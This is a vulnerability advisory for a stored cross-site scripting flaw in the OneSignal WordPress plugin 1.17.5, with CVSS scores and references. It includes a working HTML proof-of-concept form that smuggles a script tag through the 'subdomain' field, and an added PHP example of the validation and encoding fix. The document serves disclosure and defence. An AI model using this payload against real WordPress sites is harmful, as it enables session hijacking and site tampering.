CVSS2: 3.5 Low - AV:N/AC:M/Au:S/C:N/I:P/A:N
Attack Vector: NETWORK; Attack Complexity: MEDIUM; Authentication: SINGLE; Confidentiality Impact: NONE; Integrity Impact: PARTIAL; Availability Impact: NONE
CVSS3: 5.4 Medium - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: LOW; User Interaction: REQUIRED; Scope: CHANGED; Confidentiality Impact: LOW; Integrity Impact: LOW; Availability Impact: NONE
EPSS: 0.001 Low (Percentile: 26.6%)
Title: WordPress Plugin OneSignal 1.17.5 Persistent Cross-Site Scripting
Advisory ID: ZSL-2019-5530
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 18.07.2019
Summary: OneSignal is a high volume and reliable push notification service for websites and mobile applications. We support all major native and mobile platforms by providing dedicated SDKs for each platform, a RESTful server API, and an online dashboard for marketers to design and send push notifications.
Description: The application suffers from an authenticated stored XSS via POST request. The issue is triggered when input passed via the POST parameter ‘subdomain’ is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in the context of an affected site.
Vendor: iWT Ltd. - <https://www.onesignal.com>
Affected Version: 1.17.5
Tested On: WordPress 5.2.2, Apache/2.4.39, PHP/7.1.30
N/A
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://wordpress.org/plugins/onesignal-free-web-push-notifications/>
[2] <https://www.exploit-db.com/exploits/47136>
[3] <https://packetstormsecurity.com/files/153682>
[4] <https://cxsecurity.com/issue/WLB-2019070091>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/164034>
[6] <https://vulners.com/cve/CVE-2019-15827>
[7] <https://nvd.nist.gov/vuln/detail/CVE-2019-15827>
[8] <https://wpscan.com/vulnerability/9478>
[9] <https://wpvulndb.com/vulnerabilities/9478>
[10] <https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/onesignal-free-web-push-notifications/onesignal-web-push-notifications-1177-stored-cross-site-scripting>
[18.07.2019] - Initial release
[19.07.2019] - Added reference [3] and [4]
[24.07.2019] - Added reference [5]
[26.04.2020] - Added reference [6] and [7]
[28.09.2021] - Added reference [8]
[16.12.2022] - Added reference [9] and [10]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<!--
WordPress Plugin OneSignal 1.17.5 Persistent Cross-Site Scripting
Vendor: OneSignal
Product web page: https://www.onesignal.com
https://wordpress.org/plugins/onesignal-free-web-push-notifications/
Affected version: 1.17.5
Summary: OneSignal is a high volume and reliable push notification service
for websites and mobile applications. We support all major native and mobile
platforms by providing dedicated SDKs for each platform, a RESTful server API,
and an online dashboard for marketers to design and send push notifications.
Desc: The application suffers from an authenticated stored XSS via POST request.
The issue is triggered when input passed via the POST parameter 'subdomain' is
not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.
Tested on: WordPress 5.2.2
Apache/2.4.39
PHP/7.1.30
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5530
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5530.php
17.07.2019
--><html>
<body>
<script>history.pushState('', 'SHPA', '/')</script>
<form action="http://127.0.0.1/wp-admin/admin.php?page=onesignal-push" method="POST">
<input name="onesignal_config_page_nonce" type="hidden" value="f7fae30a4f"/>
<input name="_wp_http_referer" type="hidden" value="/wp-admin/admin.php?page=onesignal-push"/>
<input name="app_id" type="hidden" value="14d99ab2-fc9d-1337-bc16-a8a6df479515"/>
<input name="app_rest_api_key" type="hidden" value="M2IzZDA4MzItOGJmOS00YjRkLWE4YzEtZSLmMjllNjlkYmZl"/>
<input name="subdomain" type="hidden" value=""/><script>confirm(251)</script>" />
<input name="safari_web_id" type="hidden" value=""/>
<input name="showNotificationIconFromPostThumbnail" type="hidden" value="true"/>
<input name="showNotificationImageFromPostThumbnail" type="hidden" value="true"/>
<input name="persist_notifications" type="hidden" value="platform-default"/>
<input name="notification_title" type="hidden" value="hACKME"/>
<input name="notifyButton_enable" type="hidden" value="true"/>
<input name="notifyButton_showAfterSubscribed" type="hidden" value="true"/>
<input name="notifyButton_prenotify" type="hidden" value="true"/>
<input name="notifyButton_showcredit" type="hidden" value="true"/>
<input name="notifyButton_customize_enable" type="hidden" value="true"/>
<input name="notifyButton_size" type="hidden" value="medium"/>
<input name="notifyButton_position" type="hidden" value="bottom-right"/>
<input name="notifyButton_theme" type="hidden" value="default"/>
<input name="notifyButton_offset_bottom" type="hidden" value=""/>
<input name="notifyButton_offset_left" type="hidden" value=""/>
<input name="notifyButton_offset_right" type="hidden" value=""/>
<input name="notifyButton_color_background" type="hidden" value=""/>
<input name="notifyButton_color_foreground" type="hidden" value=""/>
<input name="notifyButton_color_badge_background" type="hidden" value=""/>
<input name="notifyButton_color_badge_foreground" type="hidden" value=""/>
<input name="notifyButton_color_badge_border" type="hidden" value=""/>
<input name="notifyButton_color_pulse" type="hidden" value=""/>
<input name="notifyButton_color_popup_button_background" type="hidden" value=""/>
<input name="notifyButton_color_popup_button_background_hover" type="hidden" value=""/>
<input name="notifyButton_color_popup_button_background_active" type="hidden" value=""/>
<input name="notifyButton_color_popup_button_color" type="hidden" value=""/>
<input name="notifyButton_message_prenotify" type="hidden" value=""/>
<input name="notifyButton_tip_state_unsubscribed" type="hidden" value=""/>
<input name="notifyButton_tip_state_subscribed" type="hidden" value=""/>
<input name="notifyButton_tip_state_blocked" type="hidden" value=""/>
<input name="notifyButton_message_action_subscribed" type="hidden" value=""/>
<input name="notifyButton_message_action_resubscribed" type="hidden" value=""/>
<input name="notifyButton_message_action_unsubscribed" type="hidden" value=""/>
<input name="notifyButton_dialog_main_title" type="hidden" value=""/>
<input name="notifyButton_dialog_main_button_subscribe" type="hidden" value=""/>
<input name="notifyButton_dialog_main_button_unsubscribe" type="hidden" value=""/>
<input name="notifyButton_dialog_blocked_title" type="hidden" value=""/>
<input name="notifyButton_dialog_blocked_message" type="hidden" value=""/>
<input name="prompt_customize_enable" type="hidden" value="true"/>
<input name="prompt_action_message" type="hidden" value=""/>
<input name="prompt_auto_accept_title" type="hidden" value=""/>
<input name="prompt_site_name" type="hidden" value=""/>
<input name="prompt_example_notification_title_desktop" type="hidden" value=""/>
<input name="prompt_example_notification_message_desktop" type="hidden" value=""/>
<input name="prompt_example_notification_title_mobile" type="hidden" value=""/>
<input name="prompt_example_notification_message_mobile" type="hidden" value=""/>
<input name="prompt_example_notification_caption" type="hidden" value=""/>
<input name="prompt_accept_button_text" type="hidden" value=""/>
<input name="prompt_cancel_button_text" type="hidden" value=""/>
<input name="send_welcome_notification" type="hidden" value="true"/>
<input name="welcome_notification_title" type="hidden" value=""/>
<input name="welcome_notification_message" type="hidden" value=""/>
<input name="welcome_notification_url" type="hidden" value=""/>
<input name="notification_on_post" type="hidden" value="true"/>
<input name="utm_additional_url_params" type="hidden" value=""/>
<input name="allowed_custom_post_types" type="hidden" value=""/>
<input name="custom_manifest_url" type="hidden" value=""/>
<input name="show_notification_send_status_message" type="hidden" value="true"/>
<input type="submit" value="Send"/>
</form>
</body>
</html>
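The flaw described above (the 'subdomain' value returned to the page without sanitization) next to a two-layer fix, as an added example that is not the plugin's own code. It is plain PHP so it runs under the PHP CLI; the function names and the DNS-label validation rule are assumptions made for illustration.

```php
<?php
// Added illustration, not the plugin's source. Function names and the
// DNS-label validation rule are assumptions made for this example.

// "Before": the stored value is concatenated into an attribute unencoded.
function render_unsafe(string $subdomain): string {
    return '<input type="text" name="subdomain" value="' . $subdomain . '">';
}

// Fix, layer 1 (input): accept only a DNS-label-shaped value, else store ''.
function validate_subdomain(string $raw): string {
    $v = strtolower(trim($raw));
    $ok = preg_match('/^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/', $v) === 1;
    return $ok ? $v : '';
}

// Fix, layer 2 (output): encode for the HTML attribute context on every render,
// so a value stored before the fix cannot close the attribute either.
function render_safe(string $subdomain): string {
    $enc = htmlspecialchars($subdomain, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="subdomain" value="' . $enc . '">';
}

// True when the rendered markup contains a live <script> tag.
function has_script_tag(string $html): bool {
    return stripos($html, '<script') !== false;
}

// Constructed inputs: two ordinary labels and the value from the advisory's PoC.
$samples = ['mysite', 'My-Site-01', '"><script>confirm(251)</script>'];

foreach ($samples as $raw) {
    printf(
        "raw=%s\n  stored after validation: '%s'\n  unsafe render has <script>: %s\n"
        . "  safe render has <script>:   %s\n  safe render: %s\n",
        $raw,
        validate_subdomain($raw),
        has_script_tag(render_unsafe($raw)) ? 'yes' : 'no',
        has_script_tag(render_safe($raw)) ? 'yes' : 'no',
        render_safe($raw)
    );
}
```

Inside WordPress the corresponding core helpers are `sanitize_text_field()` when saving the option and `esc_attr()` when printing it into the settings form.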